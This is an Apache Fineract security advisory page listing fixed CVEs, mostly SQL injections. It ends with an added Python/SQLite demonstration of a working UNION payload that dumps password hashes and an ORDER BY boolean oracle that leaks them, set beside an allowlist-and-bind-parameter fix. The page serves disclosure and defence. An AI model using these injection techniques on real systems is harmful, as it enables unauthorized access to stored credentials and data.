
This page lists all security vulnerabilities fixed in released versions of Apache Fineract. Each vulnerability is given a security impact rating by the Apache security team; please note that this rating may vary from platform to platform.

Fixed in Apache Fineract 1.3.0

CVE-2016-4977: Remote code execution via a vulnerable upstream dependency

Critical: A known vulnerability (CVE-2016-4977) in an upstream Spring Security dependency allowed malicious users to trigger remote code execution. Additional details at https://nvd.nist.gov/vuln/detail/CVE-2016-4977

Release branch with the fix is available at https://github.com/apache/fineract/tree/1.3.0

Acknowledgements: We would like to thank Roberto (extranewbugs@gmail.com) for reporting this issue, and the Apache Security team for their assistance.

Reported to security team: 17 December 2018
Fixed: February 2019
Update released: 27 March 2019
Issue public: 15 October 2019
Affects: 0.4.0-incubating, 0.5.0-incubating, 0.6.0-incubating, 1.0.0, 1.1.0, 1.2.0

CVE-2018-11800 and CVE-2018-11801: Apache Fineract SQL Injection Vulnerabilities

Important: Two SQL injection vulnerabilities were reported: the first in a query on the GroupSummaryCounts table, the second in a query on the m_center data table.

Release branch with the fix is available at https://github.com/apache/fineract/tree/1.3.0

Acknowledgements: We would like to thank Niels Heinen from Google for reporting this issue, and the Apache Security team for their assistance.

Reported to security team: 29 August 2018
Fixed: December 2018 and January 2019
Update released: 27 March 2019
Issue public: 9 May 2019
Affects: 0.4.0-incubating, 0.5.0-incubating, 0.6.0-incubating, 1.0.0, 1.1.0, 1.2.0

Fixed in Apache Fineract 1.1.0

CVE-2018-1292: Apache Fineract SQL Injection Vulnerability - Injection via reportName parameter

Critical: Within the 'getReportType' method, an attacker could inject SQL through the 'reportName' parameter to read or update data they are not authorized to access.

Release branch with the fix is available at https://github.com/apache/fineract/tree/1.1.0

Acknowledgements: We would like to thank 圆珠笔 (627963028@qq.com) and Apache Security team for reporting this issue.

Reported to security team: 23 January 2018
Issue public: 19 April 2018
Update released: 23 March 2018
Affects: 0.4.0-incubating, 0.5.0-incubating, 0.6.0-incubating, 1.0.0

CVE-2018-1291: Apache Fineract SQL Injection Vulnerability - Order by injection via Order Param

Critical: Apache Fineract exposes different REST endpoints to query domain-specific entities with a query parameter 'orderBy' that is appended directly to SQL statements. An attacker can craft the 'orderBy' value by way of the 'order' parameter so as to read or update data they are not authorized to access.

Release branch with the fix is available at https://github.com/apache/fineract/tree/1.1.0

Acknowledgements: We would like to thank 圆珠笔 (627963028@qq.com) and Apache Security team for reporting this issue.

Reported to security team: 23 January 2018
Issue public: 19 April 2018
Update released: 23 March 2018
Affects: 0.4.0-incubating, 0.5.0-incubating, 0.6.0-incubating, 1.0.0

CVE-2018-1290: Apache Fineract SQL Injection Vulnerability - Single quotation escape caused by two continuous SQL parameters

Critical: Using a single-quotation escape across two consecutive SQL parameters can cause a SQL injection. Affected methods include:
- retrieveAuditEntries of the AuditsApiResource class
- retrieveCommands of the MakercheckersApiResource class

Release branch with the fix is available at https://github.com/apache/fineract/tree/1.1.0

Acknowledgements: We would like to thank 圆珠笔 (627963028@qq.com) and Apache Security team for reporting this issue.

Reported to security team: 23 January 2018
Issue public: 19 April 2018
Update released: 23 March 2018
Affects: 0.4.0-incubating, 0.5.0-incubating, 0.6.0-incubating, 1.0.0

CVE-2018-1289: Apache Fineract SQL Injection Vulnerability by orderBy and sortOrder parameters

Critical: Apache Fineract exposes different REST endpoints to query domain-specific entities with the query parameters 'orderBy' and 'sortOrder', which are appended directly to SQL statements. An attacker can craft the 'orderBy' and 'sortOrder' query parameters so as to read or update data they are not authorized to access.

Release branch with the fix is available at https://github.com/apache/fineract/tree/1.1.0

Acknowledgements: We would like to thank 圆珠笔 (627963028@qq.com) and Apache Security team for reporting this issue.

Reported to security team: 18 January 2018
Issue public: 19 April 2018
Update released: 23 March 2018
Affects: 0.4.0-incubating, 0.5.0-incubating, 0.6.0-incubating, 1.0.0

Fixed in Apache Fineract 1.0.0

CVE-2017-5663: Apache Fineract SQL Injection Vulnerability

Critical: An authenticated user with client/loan/center/staff/group read permissions is able to inject malicious SQL into SELECT queries. The 'sqlSearch' parameter on a number of endpoints is not sanitized and is appended directly to the query.

List of vulnerable endpoints:
- /staff
- /clients
- /loans
- /centers
- /groups

Fix detail: Added logic to sanitize the sqlSearch parameter.

Release branch with the fix is available at https://github.com/apache/fineract/tree/1.0.0

Acknowledgements: We would like to thank Alex Ivanov and Apache Security team for reporting this issue.

Reported to security team: 02 April 2017
Issue public: 13 December 2017
Update released: 01 June 2017
Affects: 0.4.0-incubating, 0.5.0-incubating, 0.6.0-incubating
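
The two injection patterns these advisories describe, concatenating 'orderBy'/'sortOrder' into the ORDER BY clause (CVE-2018-1289, CVE-2018-1291) and appending a caller-supplied 'sqlSearch' fragment to the WHERE clause (CVE-2017-5663), shown beside a hardened form. This is an added example written for this page, not Fineract code: the Python/SQLite schema, table names, rows and password hash are constructed stand-ins, and the hardened version binds the search term as a parameter and allowlists ORDER BY terms, rather than sanitizing a SQL fragment as Fineract's own fix does.

```python
import sqlite3

# Constructed stand-in schema: a client table the caller may read and a user table
# holding password hashes the caller must never see. Not Fineract's real schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE m_client (id INTEGER PRIMARY KEY, display_name TEXT, office_id INTEGER);
        INSERT INTO m_client VALUES (1, 'Zed', 1), (2, 'Amy', 1), (3, 'Carol', 2);
        CREATE TABLE m_appuser (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO m_appuser VALUES (1, 'mifos', '$2a$10$constructed.hash.value');
    """)
    return conn


# Vulnerable pattern: orderBy, sortOrder and the sqlSearch fragment are concatenated
# straight into the statement, as the advisories above describe.
def search_clients_vulnerable(conn, office_id, sql_search=None, order_by="id", sort_order="ASC"):
    sql = "SELECT id, display_name FROM m_client WHERE office_id = " + str(office_id)
    if sql_search:
        sql += " AND (" + sql_search + ")"
    sql += " ORDER BY " + order_by + " " + sort_order
    return conn.execute(sql).fetchall()


# sqlSearch abuse: close the caller's parenthesis and UNION in a table the caller
# has no permission to read. Letters and digits only, so no quoting is needed.
UNION_PAYLOAD = "1=1) UNION SELECT id, password FROM m_appuser WHERE (1=1"

def dump_via_sqlsearch(conn):
    return search_clients_vulnerable(conn, 1, sql_search=UNION_PAYLOAD)


# orderBy abuse: ORDER BY accepts arbitrary expressions, so a CASE that sorts by id
# when a condition holds and by name otherwise turns row order into a boolean oracle.
# Zed(1)/Amy(2) sort differently by id than by name, which is what makes it readable.
def leak_password_prefix(conn, length=4):
    alphabet = "$./0123456789abcdefghijklmnopqrstuvwxyz"   # constructed search space
    known = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            probe = ("(CASE WHEN (SELECT substr(password, %d, 1) FROM m_appuser WHERE id = 1) = '%s'"
                     " THEN id ELSE display_name END)" % (pos, ch))
            rows = search_clients_vulnerable(conn, 1, order_by=probe)
            if rows[0][1] == "Zed":      # sorted by id, so the guess was right
                known += ch
                break
        else:
            break                        # character outside our alphabet; stop
    return known


# Hardened form. ORDER BY terms cannot be bound as parameters, so they are checked
# against an allowlist; the search term is a plain value bound with a placeholder.
ALLOWED_ORDER_COLUMNS = {"id", "display_name"}
ALLOWED_SORT_ORDERS = {"ASC", "DESC"}

def search_clients_hardened(conn, office_id, search=None, order_by="id", sort_order="ASC"):
    if order_by not in ALLOWED_ORDER_COLUMNS:
        raise ValueError("orderBy must be one of %s" % sorted(ALLOWED_ORDER_COLUMNS))
    direction = sort_order.upper()
    if direction not in ALLOWED_SORT_ORDERS:
        raise ValueError("sortOrder must be ASC or DESC")
    sql = "SELECT id, display_name FROM m_client WHERE office_id = ?"
    params = [office_id]
    if search:
        # The term is data, never SQL. LIKE wildcards in it (% and _) still match
        # broadly, which is a precision issue for the caller, not an injection.
        sql += " AND display_name LIKE ?"
        params.append("%" + search + "%")
    sql += " ORDER BY %s %s" % (order_by, direction)   # both values came from the allowlists
    return conn.execute(sql, params).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("leaked hash prefix via ORDER BY oracle:", leak_password_prefix(db))
    print("rows returned for injected sqlSearch:", dump_via_sqlsearch(db))
    print("hardened search for 'Am':", search_clients_hardened(db, 1, search="Am"))
    print("hardened search with payload:", search_clients_hardened(db, 1, search=UNION_PAYLOAD))
    try:
        search_clients_hardened(db, 1, order_by="(CASE WHEN 1=1 THEN id ELSE display_name END)")
    except ValueError as err:
        print("hardened orderBy rejected:", err)
```

The ORDER BY oracle is the reason an allowlist, not escaping, is the right fix for 'orderBy' and 'sortOrder': the attacker never needs a quote character, only an expression the database will sort by. The search term, by contrast, is a value and belongs in a bind parameter; the authorization check on office_id stays in the query the server wrote, so it cannot be closed off by the caller.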